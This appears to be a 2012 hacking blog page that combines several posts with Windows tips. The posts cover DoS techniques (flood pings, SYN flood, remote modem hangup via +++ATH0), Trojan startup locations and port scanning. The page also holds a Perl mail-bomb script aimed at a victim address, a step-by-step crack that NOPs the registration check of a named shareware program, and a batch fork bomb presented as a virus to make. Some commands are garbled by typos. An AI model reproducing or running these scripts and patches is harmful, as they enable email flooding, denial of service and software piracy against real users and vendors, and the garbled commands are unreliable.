Ads 468x60px

Label 3

Your label here

Sample Text

Sample text

Random Template

Your label here

Popular Template

Recent Post

Label 6

Comments

Label 5

Label 4

Label 1

Your label here

Your label here

Your label here

Label 8

Your label here

Featured Posts

Friday, 31 August 2012

NETWORK SECURITY



NETWORK SECURITY
Most computes criminals and hackers strike not because of their knowledge but they bloom because of the ignorance the users, system administrator on using their systems and servers and computer networks.
1.There are open ports on which hackers may attack.
2.There are dangerous kinds of attacks on the servers and administrators
3.There are mechanisms of securing window NT server administrator passwords.
This project is based on practical techniques, tacts, of attacking and the concept and mechanism of their attacks.
Thus for stopping the net criminals from intruding into the systems, the system administrator should know the drawbacks, loopholes of the OS, internet, and networking.
These papers give the details of different kinds of attacks that a hacker may onslaught on the administrator. Concepts and techniques of attacks like DOS attack, controlling and disconnecting remote modems,Trojan attasks, mail bombings etc.
.Emphasis is given on the open ports on which the hacker usually attack

ATTACKS ON THE SERVER.

DOS ATTACKS
Denial Of Service attacks( DOS attacks) are very common hacking attack now. It is defined as : An attack on the target system by a malicious attacker to render the normal services offered by it to legitimate users as unavailable or disable services..It involves the launching of an attack that will make the services offred by the target system or normal services offered by the internet or a network system to a legitimate user.
DOS attack can be described as one in which the target system’s memory is is so much clogged that it cannot serve legal users.Or system target is sent so much data files that,which can’t be handled by it and it crashes or reboot.

KINDS OF DOS ATTACK
PING OF DEATH:- Ping is a part of the ICMP protocol i.e. the internet control message Protocol.This is used to troubleshoot the TCP\IP network.
Ping is a command that sends out a datagram to the specified host. This specified host if alive i.e. turned on ,sends out reply or echoes of the same datagram. If the datagram that returns to our computer has the same datagram that was sent, then it means that the host is alive. Therefore ping is basically a command that allows to check if a host is alive or not. It can also be used to determine the amount of time taken for a datagram to reach the host.
Actually it is so deadly so that it can be used to ping a hostname perpetually, that may cause the host to crash. When a host receives a ping signal, it allocates some of its resources to to attend to or to echo backthe datagram. Now, if a host is pinged perpetually, then a time will come when all resources of the host are used and the host either hangs or restarts.
Due to ping’s deadly nature,most shall account ISP hide the ping utility.
It can be find out by using the command :
Whereis Ping
It is usually hidden in /usr/etc.
The flood ping which pings a host perpetually is:
Ping –t hostname
Ping –a can be usedto resolve addresses of the hosname.
We can even ping ourselves.The IP 127.0.0.1 is the local host. This means that when we connect to 127.0.0.1 , we actually connect to our own machine. Therefore to ping ourselves perpetually, we give the command:
Ping –t 127.0.0.1
However the flood ping no longer works as most of the OS have been updated.
The following ping command creates a giant datagram of the size 65,510.
C:\windows>ping –165510
This might hang the victim’s computer.
FPING UTILITY: this tool allows to send mass echo request to a huge number of systems.The normal ping sends out echoes one by one to eachj system on a network. Against this, fping sends mass echoe requests to the entirenetwork at a single time. Hence it is more efficient.
SYNFLOOD ATTACK:- SYN flooding is flooding the target system with so many connection requests, that all it’s mamorr gets hogged up in trying to establish proper connections with allthese requests .In effect, since all the memory of the target system is used up in trying to establish connections, the target system is unable to provide services even to the legitimate users.The SYN attack TCP/IP in three way handshake.whenever a client wants to establish a connections with a host,three steps takes place,known as three steps handshake:
1. The client system sends a SYN packet to to the remote host.
Client---------------SYN packet---------------Host
2. The remote host replies with a SYN/ACK packet to the client.
Host----------------SYN/ACK packet-------------Client
3. The client replies with an ACK packet,acknowledging the packet sent by the hostin step 2.
Client------------------ASK----------------------Host.
The above is known as three way handshake and only if the above are completed, a complete TCP/IP connection is established between a source and destination.
In SYN attack several SYN packets are sent to the server but all have a bad source IP address.When a server receives these SYN packets with bad IP addresses,it tries to respond to each one of them with a SYN ACK.Now the target system waits for an ACK message to come from the bad IP address.But as the IP doesn’t exist,the target system never receives the message.Hence these requests occupy large number of resources of the target system.As a result,due to large no of requests,the memory of the system gets hogged up and it becomes unable to respond to the legal users.Thus the server eventually crash, hang or reboot.
In accordance with the rules of TCP\IP,after a certain time has passed, a timed out takes place and the connection requests Queued up by the target system are discarded and thus a part of the hogged up memory is freed.Therefore in SYN flood attack, the attacker keeps on sending connection requests at a faster rate then the timed out take place.Thus the attacker keeps the target system hanged.
To know that we have been attacked,type the command:
C:windows>netstat –a
This will show as:
Active Connections
Proto Local Address Foreign Address State
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya 201.xx.34.23 SYN_RECEIVED
TCP aditya *.* ESTABLISHRD
If the above command shows a lot of connections in the SYN_RECEIVED stata,then probably the system is under SYN attack. The connections under ESTABLISHED state are legitimate connections.
CONTROLLING AND DISCONNECTING REMOTE MODEMS.
Let our IP address is xx.xx.xx.xx and the server we are connecting to has the IP yy.yy.yy.yy.Let us assume a single data packet and send it to yy.yy.yy.yy,then the packet will take the following path to reach the destination.
Data packet at source-----------Modem of source-------------Router------------
Modem of Destination---------------Destination Server.
Thus, each data packet goes VIA MODEM, both at the source and the destination.Thus all data goes through modems and this data may be a command.
A syatem controls a modem by issuing the commands which are generally referred as AT commands. The word AT precedes all modem commands with a few exceptions.
An example of the AT commands is that is issued when you dial into your ISP.When you click on the ‘connect’ button, the DUN software sends the following command to your modem:
ATDT and ATDP command followed by the number you want to dial and enter.
To Issue command to the modem, it should be in the command mode.
A modem is always either in the command mode or in the online mode.When the system boot up, the modem, by default, is in the command mode.When the modem is in the command mode, then the AT commands are considered to be commands, while in the online mode all commands are considered to be data packets.
When we are connected to the internet, the modem is in the online mode, and thus can’t accept any command.This means that if we know the IP address of a person,and send a modem command string, the modem will only treat it as normal data and will not react to it.Thus the modem has to be switched in the commend mode.
When the modem is in the online mode, it can be brought to the command mode by sending it the escape characters.i.e.+++.Pressing the escapes character will switch the modem to the command mode and it will start reacting to the AT commands.
To return the modem in the online state, ATO command is given.
Thus if we know the IP address of a person, and we send the +++ string to it followed by the AT modem commands, we can practically control the remote modems.We can do anything with the modem.
H0 is the AT command that instructs the modem to hangup or disconnect.
If we want to disconnect our own modem, then we will issue the following command:
+++ATH0
This command switches the modem from the online mode to command mode and then send it the H0 command which disconnects the modem.
If we send this command to the remote modem, it will disconnect that too.
NOTE:The command ATH0 don’t work on all modems.
The way the command ATH0 works is that it hides escape/control sequences in an ICMP echo request packet.( it contains the string +++ATH0).Actually the string +++ sends the modem into escape mode, and if the guard time on the modem is set very low it will go into command mode instantaneously and we can issue it the AT commands.The system receives the echo request package with a new timestamp and checksum,destination/source hosts and return it to
sender. When it returns, the string is send to the modem and thus execution of the command takes place.There are few conditions that must be met for it to work. These are:
1. The target computer must not filter ICMP echo requestsand must know how to reply to one if it gets one.
2. The target computer must be using a modem
3. The target computer must have a vulnerable modem (i.e. guard time must be set nvery low) .
2. Spoofed ( i.e. with bad IP ) packets must be sent to the target computer, otherwise the target computer will know that from where these are coming from.
TROJAN/KEY LOGGER ATTACKS
Trojan is a tool which when installed in a system,can be misused for malicious purposes by the attacker.They are capable of doing a lot of harm to the target computer.
Almost all Trojans are made up of:
1.THE SERVER PART:This part of the Trojans should be installed and be running on the target system.
2.THE CLIENT PART:This part of the Trojan is installed and running on the attacker’s computer.
The Trojans attack in the following way:
1. The attacker tries to install the server part of the Trojan on the target system, iny of the following methods:
(a). Sending the Trojan disguised as a normal file through ICQ or any other instant messaging software.
(b). Installing the Trojan on the target computer manually.
©. By Trickery:In this method, the attacker either hides the Trojan server part into normal.EXE file.This file is chosen by the attacker on the basis this victim finds this file as useful and he installs this infected file.
2. Once the attacker has been able the Trojan on the server system,it binds a particular port on the target computer and the attacker listens for the connections.Each Trojan has a particular port to which it binds.
3. As soon as the attacker listens for the connections, he tries to know the IP address of the target computer.
4. As soon as the attacker gets the IP address of the target system,he uses the client part of the Trojanof his system and thus the attacker becomes able to control the target system.Thus, using this Trojan, the attacker can enjoy full control on the target system.
DETECTION OF A TROJAN:
Almost all types of Trojans are loaded into the memory each time the window boots up.There some common references or the locations where the are known or hiding are:
(A). THE START UP FOLDER: c:\windows\startmenu\programs\startup
This folder is actually stored in the registry:
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shell folders]
Common startup=c:\windows start menu\programs startup.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\user shall folders]
Startup= c:\windows start menu\programs startup.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\ shall folders]
Startup= c:\windows start menu\programs startup
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\user shell folders]
Common startup=c:\windows start menu\programs startup.
(B). SYSTEM FILES: The two system files,win.ini and system.ini are also executed
(c). BATCH FILES: The two batch files, autoexe.bat and winstart.bat arev also executed.These batch files may contain the malicious commands.
(D). THE WINDOW REGISTRY: The Trojan programs may also reside in the window registry and thus the following registry are executed when window boots.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservices]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservicesOnce]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunOnce]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\RunServices.
Thus by monitoring these and other places,we can detect the presence the Trojan viruses.

MAIL BOMBING
Mailbombing means to send a huge amount of emails to a single email account so that the maximum space of the account is filled and the user can’t receive any further email and making it difficult for the user to read the existing emails.
Mailbombing is of two types:
1. THE MASS MAIL BOMBING METHOD: In this kind of attack the user’s account is filled with huge number of the emails.There are mail bombing softwareswhich allow to send a particular message using a SMTP server.These softwares can be maid easily ib pearl.
e.g. #!/bin/pearl
$mprogram=’/usr/lib/sendmail’;
$victim=’victim@hostname.com’;
$var=0;
while($var<1000)
{
open (MAIL,”|$mprogram$victim”)||die”can’t open mail program”;
printMAIL “Mail Bombing”;
close(MAIL);
sleep(4);
$var++;
}
This program will send 1000 emails to the target account.
LIST LINKING: In this mailbombing the target is subscribed to thousands of mailing list. This kind of mail bombing is more effective as the server has to unscribing himself from this long mailing list.
The List Linking mailbombing is done by the use of mail bombing software.This software asks the target email address , the address of the SMTP server,the forged email address from which the mail bomb is to appear.
This software subscribes the victim again and again, abd thus he has a lot of work to do. He even has to miss his incoming important emails and existing emails.
In this type of attack, don’t download all the massages and deleting. Instead, log on to the POP port of your mail server and delete the useless massages using POP commands.And by reading the header , the mailbomber can be easily traced.

PORT SCANNING

There are basically two kinds of ports—Physical(hardware) and Virtual(software).
Hard ware are the slots behind the CPU to which other system davices are connected.A software port is a virtual pipe through which informaion flows. A particularsystem can have a large number of ports. All ports are numbered and on each port a particular service or software is running.
Port scanning is the first step in finding a hackablr server, with a hole or any vulnerability.
If we are to hack our ISPserver, then we first have to find out the hostname of the server run by the ISP.Now each server can have a large number of open ports and it will take days to manually go and search the services running on each port.This is where the port scanning utilities come in.
Tools like SATAN allow to find out the list of the open ports and the services running on them and also the vulnerability of the target system.
Another thing we must be careful about port scanning the ISP is that most port scanners are easily traceable.If caught port scanning on the host, then this is a sure symbol of hacker’s activity.
To find out the list of the open ports on our own system,we have to give the command:
C:\windows>netstst –a
The ports are of three kinds:
1. The well known ports:These ports are the ports which are numbered from 0 to 1023.This range of the port is bound to the sevices running on them. Thus each port has a specific service running on it.
Eg. The FTP runs on Port 21.
3. The registered port number:These ports are from 1024 to 49151.This range of the port is not bound to any specific service. Actually networking utilities like browser email opens a random port within this region and starts the communication with the remoye server.A port number within this region enables us to surf the net .
These ports are simply open so that our software applications can do the desired work.They act as a buffering transferring packets received to the application and vice versa.Once we close our application, these ports are automatically closed.
3. THE DYNAMIC/PRIVATE PORT NUMBER.:These ports are the ports from 49152 to 65535. This range is rarely used and is mostly used by Trojans.
Eg. Sun starts its RPC port at 32768.

BLOCKING THE PORTS:
Thus, this basically shows us to what to do if the netstat command gives us a couple of open ports on our system or server.
1. Check the Trojan list and compare if the open port number matches any Trojan list. If it does ,get a Trojan remover and remove the Trojan.
2. WE can also remap the ports. This is an efficient method to secure our open ports. The remappng is done by the fact that instead of running a service on a well-known port,where it can be easily exploited, it better to run it on a not so known port. Thus a hacker will find it more difficult to find that service.This method is known as remapping.
3. ETHERPEEK is an excellent sniffing software,which can easily trace the port scanner.
4. NUKE NABBER, a window freeware, claims to be an excellent port blocker.
5. There are other utilities such as PORT DUMPER, which can fake daemons (services) like Telnet, Finger printing, etc.

SECURING WINDOWS NT ADMINISTRATOR PASSWORDS
(Source : www.ntbugtraq.ntadvice.com/default.asp )
The NT Security Access Manager (SAM) is the security manager of the passwords of the windows NT Administrator. The SAM stores the list of the usernames of all accounts and their respective passwords in the encrypted form of all local users on that particular domain. Cracking the encrypted passwords stored by SAM is all needed to control the entire network.
By default the backup of SAM is stored in the file %systemroot%\repair\sam._.And by default , This directory allows everyone to read access. Thus it is possible to retrieve the hashed(encrypted) passwords from the file directly. There it is required not to give access to the root directory of the %systemroot% drive against having any system file manipulated.
Recently the algorithm of reversing the NT user hashed passwords into NT user ID’s passwords was published.
This created a scary concern over the relative security of the Window NT Administrator System.
Therefore RECOMMENDATIONS to secure the file %systemroot%\repair\sam._ [this file stores the backup of SAM(SAM stores the passwords),and hence one of the most important file]. These are:
TO SECURE THE %systemroot%\repair\sam._ FILE:
By default, the SAM._ and \repair directory has the following permission:
Administrators; SYSTEM : Full Control
Everyone: Read
Power Users: Change
1. From within Explorer, highlight the SAM._ file, right click, choose properties,security,permissions. Remove all privileges from this file.
2. From DOS prompt, execute the following;
Cacls %systemroots%\repair\sam._ /D Everyone
This will deny the group Everyone permission to the file, ensuring that no other permission can override the file permission.
3. Whenever you need to update your ERD(Emergency Repair Disk), first execute the following at DOS;
Cacls %systemroot%\repair\sam._/T/G Administrators:C
This will grant Administrators change permission to update it during the ERD update. (SAM database is backed up whenever ERD is updated).
4. Once the ERD has been updated, execute the following at DOS;
cacls%systemroot%\repair\sam._/E/R Administrator
This will once again remove the permission for Administrator.
Hence the file is fully secured.

All about Cracking


How to crack software
How to crack software – a beginner's tutorial!

Introducion:

I have read many cracking tutorials lately. Frankly speaking, I myself learned cracking from tutorials (and some book, but
this doesnt really matter). The majority of the cracking tutorials out there have a few disadvantages: either they are too long
and contain a lot of garbage, or they are too short, and don't contain the basics.


I decided to write a tutorial which will not have those two disadvantaged.

Anyway, I divided the tutorial into 3 parts:

Part 1: Introduction, tools and The basics of cracking.

Part 2: Practical training, using W32Dasm, and HIEW

Part 3: Key-generators.

Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program, which is on your computer behave as you want it to behave and not behave as someone else (the
programmer) wants"

As INTERN said: "Hey, it is your stuff right? your numbers, your bits, you should be able to do anything you wish to do with it "

Actually, I agree to this.

So cracking is modifying your programs, and making them work they way you want them to. U can get a free demo
program, crack it, and use it. BUT!!!! I repeat, if you crack a program, and start selling the cracked version or even offering it for free, it is a crime!

After reading those three tutorials (this is the first one in thsi series), you will feel the power you have in your hands (I mean, in your head).

well, let's get started?

3. Tools

There are very few tools you need by now... It is very easy to find them over the web, cause they are quite popular:

The first one is " Win32 Disassembler ", which is also know as W32Dasm.

The Win32 Disassembler allows you to:

1.Disassemble files - translate the program to it's assembly origin, or machine code.
The file types which can be disassambled in Win32 Disassembler:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx, vbx and sys.
2.Load the program proccess and trace the program. 3.Browse the disassembled file and go to any code location that you want. 4. Find text. 5.Execute, insert or remove jumps and calls.
6.Import and export functions.
7.Show a HEX display of a code area.
8.Show the list of the STRINGS, DIALOGS and REFERENCES.
9.Save the Disassembly source in text format.

Well, u can get it in almost any cracking site, but I'll give you some URLs:

1.http://wowsites.com/meiner/w
32dsm89.zip

The second tool you need is Hiew, which is also known as Hacker's View. The Hacker's View Tool allowes you to:

1. Disassemble files.
2.Make changes in the disassembled file, such as: write commands, modify commands and reassemble the file.
3.View the file in ASCII, Hex or assembly mode.

You can also download an excellent program for cracking called Soft-ICe. Anyway, we won't need it in this part of the tutorial. Anyway, here are some URLs for Soft-ICe.

link - http://www.plunder.com/Softi
ce-Insta...load-83770.htm

4. The Main steps of cracking


There are 7 steps in the process of cracking:

1.Run the program you want to crack and learn it's standard behavior. Try to locate strings and keywords, try to enter the password and see how the program responds.
2.Open up the program with the W32Dasm and disassamble it.
3.Find typical and common strings in the disassembly that appeared in the program. In most cases, you have to look
for keywords such as: password, name, date, expired, time limit, wrong, entered and so on.
4.Find and observe the password generator, find the learn protection routine and the API calls.
5.Try to understand the jumping mechanism of the protection.
6.Open up the program in HIEW. Change the jump of the flow control to it's oposite jump command, or nop it out.
7.Run and see how the change you have made in the original program affected it. Feel the power you have, the
power of cracking, letting programs behave as you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

5. Basic terms in Assembly

A. Registers:

Registers are variables which are stored in your processor. The processor uses these variables for basic mathimatical and
logical operations. The mostly used registers are: eax, ebx, ecx and edx. Sometimes you will see edi, esi, esp, ebp. There
are three types of registers: 32Bit registers, 16Bit registers and 8Bit registers. The 32Bit registers start with e, such as eax.
There are 16Bit equivalents of these registers. The only Difference between the two types is the veriable size. These
registers are: ax, bx, cx, dx, di, si, sp, bp. There are also 8 bit registers. Tthe 8Bit registers are: al, ah, bl, bh, cl, ch, dl, dh. l -
means the lower 8 bits of the 16Bit register. h - means the higher 8 bits of the 16Bit register. Here the l stands for the lower
and h for the higher 8 bits of a 16 bit register.

B. Flags:

Flags are Boolean variables (get 0 or 1 values). Flags are used by the processor for internal logical and mathimatical
operations, in order to get the result of the operation. The most important flag is the Zero Flag, which can get zero or non-
zero (1) values.

C. Code Flow

When you are analyzing a piece of code, you must understand that the processor is actually quite stupid, and all it does is
to simply follow the basic instructions, line by line. It does anything the code tells it to do, and cannot do anything that is not
written in the code (unless it has been run over by a herd of cows and abducted by aliens). This is why you have to think like
the processor when you're analyzing a piece of code, and to act like it (just don't get used to it! Inhale, exhale, inhale,
exhale... nevermind, stupid joke) You have to do everything the processor does, you have to compare registers and
variables, execute jumps and calls, calculate Basic mathimatical operations, store and load register values and adresses,
and so on... The processor has an instruction pointer especially for this, which is also called IP (it has nothing to do with IP
addresses in the Internet Protocol, trust me). Using the instruction pointer, the processor points to the instruction that is
about to be executed. The processor also has and executes instructions which change the code flow.
These instructions can be function calls, any other routine calls, jumps, conditional jumps, which depend on the zero flag,
negative conditional jumps...

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking. Making programs behave as you want them to,
and not the way the programmer wants them to. We have also learnt about the basic and the popular tools of cracking:
W32Dasm, Hiew and SoftICE. And finally we have learnt the 7 main steps of cracking.
Now, Before you go to the next chapter, you have to learn these 7 steps and download the tools mentioned above, because we can't go on to the next chapter unless you have those tools and know the steps

Part 2

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most important tools of the common cracker: W32Dasm and HIEW. You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:

Part 1:Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators

1. Disclaimer:


I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial, but it's very important to know them. Remembering these steps and following them is 40% of the way towards success in cracking the program!!!

There are 7 steps in the cracking process:

1.Run the program you want to crack and study it's behavior. try to locate strings and keywords, try to enter the password and see how the program responds.
2.Open the program with the W32Dasm and disassemble it.
3.Find typical and common Strings in the disassembly that appeared within the program.
in most cases, you have to look for keywords such as: password, name, date, expired, Time limit, wrong, entered and so on.
4.Find and observe the password generator, find the learn protection routine and the API calls.
5.Try to understand the jumping mechanism of the protection.
6.Open the program in Hiew. change the jump of the flow control to it's opposite jump command, or NOP it out.
7.Run and check how the change you have made in the original program affected it.
Feel the power you have, the power of of cracking, making programs behave the way you want them to.

Learn those steps very well, until u dream of them, u will use them in every program you crack.

3. Additional programs you need to have for this part of the tutorial

By now, in this part of the tutorial, you have learnt the main steps of cracking. Now, you are going to crack your first program.

But before that, you need to get a little program called: "Sweet Little Piano" You can download it from:http://www.ronimusic.com/

Now, when you have the program, let's start!

4. Cracking the first program (Sweet little Piano)

Now we will follow each step and crack the program:

Step 1: Running the program:

Well, Run it! Duh... :-)

Well, what do we see here..... The program opens two text files. Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options... Humm, what do we see here now...
oh, it's a password option... Well, select it and enter something (don't hope it will be right :-)). To see what happens... Click
OK.. Hmm, nothing happens.... Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered... Ok close it...
bah ... more text files ... and a notification that the settings are not saved in the unregistered version ... well ... kind of
irritating those text files! Let's fix it :-)

Step 2: Disassemble the program:

Disassemble the program. Good, small is fast :-) Always.... Now, we don't have any strings that pop up when we want to
register something... Let's browse for strings like registered, unregistered, the string about the unsaved settings. Hmm...
evaluation time left ... password.txt.... passworddialog.... sweet little piano - Unregistered <<-- looks like our caption bar ;-)
go on...Thanks for registering ... cool! So it thanks you anyway :-) Let's jump to that place ... Double click on it an we will pop
right on top of the registration routine...

Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...

Let's analyze the protection routine.


PasswordDialog ... a call to GetDlgItemTextA ... another call.... a test... and depending on the test a je.... The je jumps over the thank you ... And just ends the dialog box ... without telling you that you entered something wrong... So this is right ... we did indeed not see that we typed something wrong ... but apparently we are supposed to see if we type something right

Again execute the je jump, and look where it goes to ... return from the jump.... Now lets try to rewrite what goes on here...

call ShowPasswordDialog
call GetEnteredText
call IsEnteredTextGood
test value in eax
je QuietExit

ShowThanksForRegistering

QuietExit:

the source code must have looked like this :

GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering

// else nothing....

This is another interesting piece of code.... test eax, eax ... this assembler instruction tests if the value of eax is equal to
itself ... if it is it is equal ... so a je instruction jumps ... if it is not equal, it does not jump.... To crack this program we can change the je instruction into two nop instructions... and we are done...

We have seen here, that the call has put a value in eax.... something which is not equal to zero or a zero... In our previous
example we saw that the called Is_Serial_Valid call set some value in memory ... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....

Step 4: Changing the original program...

So modify it :-)

1. Open Hiew. 2.Open the file within Hiew.
3.Find the Adress of the line in W32Dasm (it's on the status bar beginning with '@').
4.Press F5 in Hiew.
5.Enter the address you have found in (4) and press ENTER.
6.Press F3 - for activating the write option.
7.Press F2 - to change the instruction.
8.Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9.Now a new command appeared in the next line.
10.Replace it by NOP too.
11.If another new instruction hasn't appeared, Press F9 to update the file.
12.Press F10 to exit.
13.Run the program and see the result.

Anti- Shortcut Virus


If your flash drive(pen drive) is affected with shortcut viruses..then follow this steps

Click on "Start" -->Run.

Here I assume your flash drive letter as G:

Enter this command.

attrib -h -r -s /s /d g:\*.*

Copy the above command and paste it in Run .

Note : Don't forget to replace the letter g with your flash drive letter.

Now press "Enter".

Now check for your files in Flash Drive.

Smallest Virus


A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.




A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash.
A fork bomb creates two instances which each create two instances and so on..the processes recursively fork, this "forks" the processor and jamm it completely until a crash occurs.
Here is how to make it
open up notepad and type:
%0|%0
and save it as fork.bat Yep..its a virus of just 5 characters :P .
On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt .

10 ways to a better Security


(1)always scan your file at http://scanner.novirusthanks.org/ Do not distribute the sample or http://www.virustotal.com/

(2) sandbox everything and use Anti-Malware

(3) make a vmw = vmware workstation

(4)use a keyscrambler in your vmware

(5)use firefox always delete Cookie and history after closing never save password

(6)if u are going to hack use a vpn- virtual privet network

(7) if your buying some software form a user make sure u research him
read his threads ask a friend. read the scam page.send the money as a gift on paypal.

(8)if something looks to good 2 be free well its not its most likely backed door

(9) never download form a telnet Nono= ppl with 10 post

(10) add a firewall in your vmware workstation and anti virus guard

(11) add a firewall anti virus guard on your pc outside your vmware workstation use a scrambler and a sandbox everything

(12) buy a 5tb External Hard Drive and back up everything ((scan file)) b4 adding

(13) one of the important factors in keeping tools undetected from anti viruses

How To Lock Your Computer With USB Drive


How To Lock Your Computer With USB Drive
Tired of people starting your computer when you are not around and messing up custom settings? Wouldn’t it be cool if you could lock your computer by just removing your USB stick from it? I’ll show you how you can use your USB stick, Flash Drive or Pen Drive what ever you call it to lock your computer, among other things…

Boot Lock
This trick will allow you to use your USB to BOOT into Windows. If someone tries to start the computer without your USB stick, it will display boot errors. Before begin, you playing with the BIOS and boot files of your computer may result in you not being able to boot into your Windows partition; so continue at your own risk! Things you need: A 64MB or larger sized USB Stick, Windows Recovery Disk (just in case).

 Unhide hidden and protected files : Go to Tools > Options > View, check Show hidden files and un-check Hide protected system files.

From the drive where Windows is installed (normally C:\), copy the files boot.ini, ntdlr and NTDETECT.COM to your USB Stick.
Now, we need to go into your BIOS, so restart the computer and keep jabbing [F8] as soon as the computer starts.
Once in the BIOS, enable USB Drive as the first boot device. You might have to enable USB Legacy  Support on older BIOSes.
Restart your computer, if all goes well, you should be able to log into Windows. If not, then unplug the USB Stick, return to the BIOS and change the First Boot device to your hard disk drive and repeat the steps above.
Once you are logged into Windows, go to your Windows drive and rename boot.ini to boot.bak.
To check if you have setup everything correctly, eject your USB stick and reboot the computer. You should get error messages on the screen such as Invalid Boot.ini” or “Windows could not start”.

All About IP address part-2


There are two ways two change your IP on Windows. The easy way, and the hard way. Ill discuss how to do both of them in this tutorial.

Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address. (note you do not use the "-" when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all
-----------------------------------------------------------------------------------------------------------------------------------------------

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the "NetCfgInstanceId" Key with the number you wrote down earlier. Once you find a match double click on the key "NetworkAddress" and change the value to your new MAC address. Hit ok and reboot your system.




There r several ways u can determine ur IP address information:

IPCONFIG

Start / Run / cmd
IPCONFIG /ALL
This opens a command window. One advantage is that u can send the information to a text file (IPCONFIG /ALL > c:\ip.txt)
But sometimes the window shows show much information u need to scroll around to fine it.

VIEW STATUS

Control Panel / Network Connections / Double click the icons 4 ur network (If the network has an icon in the system tray u can also just double click on that icon)
Click on the Support tab
Click on the Details button
:::::::::::::
Make Pictures Smaller Unavailable

When u try nd send pictures through e-mail, u should normally be given the option to make them smaller.
If this option is not available, a DLL file may need to be registered.

Start
Run
regsvr32 shimgvw.dll
:::::::::::::
Creating a Suspend Shortcut

If u would like to create an icon to suspend ur computer,

Right click on the Desktop
New / Shortcut
Enter in rundll32.exe PowrProf.dll, SetSuspendState
Give it whatever name u want
Now when u click on that shortcut, ur computer will shutdown nd suspend
Submitted by Gabe
:::::::::::::
Changing the User Type

Normally in XP Pro, through the Control Panel / User Accounts icon, u r only allowed to create administrators or limited users.
If u want to create

Right click on My Computer
Manage
Local Users nd Groups
Users
Right click on the user u want to change
Properties
Member of tab
Add button
Advanced button
Find Now button
From here u see the full list of possibilities (e.g. Power User, Backup Operator etc.)
:::::::::::::






some more
Determining Which Services r Associated with SVCHOST

Since so many critical services r run with each svchost,
You can see which ones r being used by opening a cmd prompt nd running:

tasklist /svc /fi "imagename eq svchost.exe"

Note: This is available only with XP Pro
:::::::::::::
Identify Faulty Device Drivers

If u r having problems with lockups, blue screens, or can only get to safe mode,
often the problem is due to a faulty device driver.

One way to help identify them is through the use of the Verfier program

Start / Run / Verifier
Keep the default of Create Standard Settings
Select the type of drivers u want to confirm
A list of drivers to be verified on the next boot will be shown.
Reboot
If ur computer stops with a blue screen, u should get an error message with the problem driver
To turn off the Verifier, run verifier /reset
:::::::::::::
Viewing Installed Drivers

If u want to see a list of installed drivers, u can run the driverquery program
There r a lot of available switches to view different types of information.
On use can be to export to a CSV file 4 viewing in Excel
An example would then be:

Driverquery /v /fo csv > drivers.csv